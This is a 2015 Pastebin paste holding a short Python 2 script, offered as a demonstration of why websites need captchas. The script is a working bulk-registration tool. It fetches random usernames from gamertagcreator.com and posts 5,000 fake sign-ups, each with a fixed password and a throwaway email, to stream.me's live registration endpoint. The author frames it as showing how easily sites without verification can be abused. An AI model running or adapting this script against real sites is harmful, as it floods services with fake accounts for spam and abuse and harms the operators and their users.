Advertisement
Guest User

Captchas are necessary ok.

a guest
May 19th, 2015
199
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.38 KB | None | 0 0
  1. import requests
  2.  
  3. URL = "https://www.stream.me/register"
  4. print '-----------------------------------------------------------------------------------------------'
  5. print 'This is why you need captchas. - Originally pasted on April 1rst, 2015. Made April 1rst, 2015. '
  6. print '-----------------------------------------------------------------------------------------------'
  7.  
  8. #This is seriously nothing special. More so just a way to show new websites that it doesn't take
  9. #300 lines of code to abuse their lack of verification.
  10. #Carter Smith, 2015.
  11.  
  12. global count
  13. count = 0
  14. global total
  15. total = 5000 # total accounts to make
  16.  
  17. while count < total:
  18.      httpResponse = requests.get("http://www.gamertagcreator.com/ajax-suggestion-refresh.php")
  19.      userName = httpResponse.text.split()[0].split()[0].lower()
  20.      if "+" in userName:
  21.           userName = "%s" % (userName.split('+')[0])
  22.  
  23.      PARAMS= {
  24.          'username': userName + 'RootAccount',
  25.          'password': 'apple123',
  26.          'email': userName + '@airmail.cc',
  27.          'month': '.0.7.0.1.0.$February',
  28.          'day': '.0.7.0.1.1.$2',
  29.          'year': '.0.7.0.1.2.$1990',
  30.          'gender': 'M', #Was looking for a numerical value for a solid 5 minutes. zz
  31.          'post': 'Submit',
  32.          }
  33.    
  34.    
  35.      print userName + 'RootAccount'
  36.      requests.post(URL, data=PARAMS)
  37.      count += 1
  38. print 'Accounts made.'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement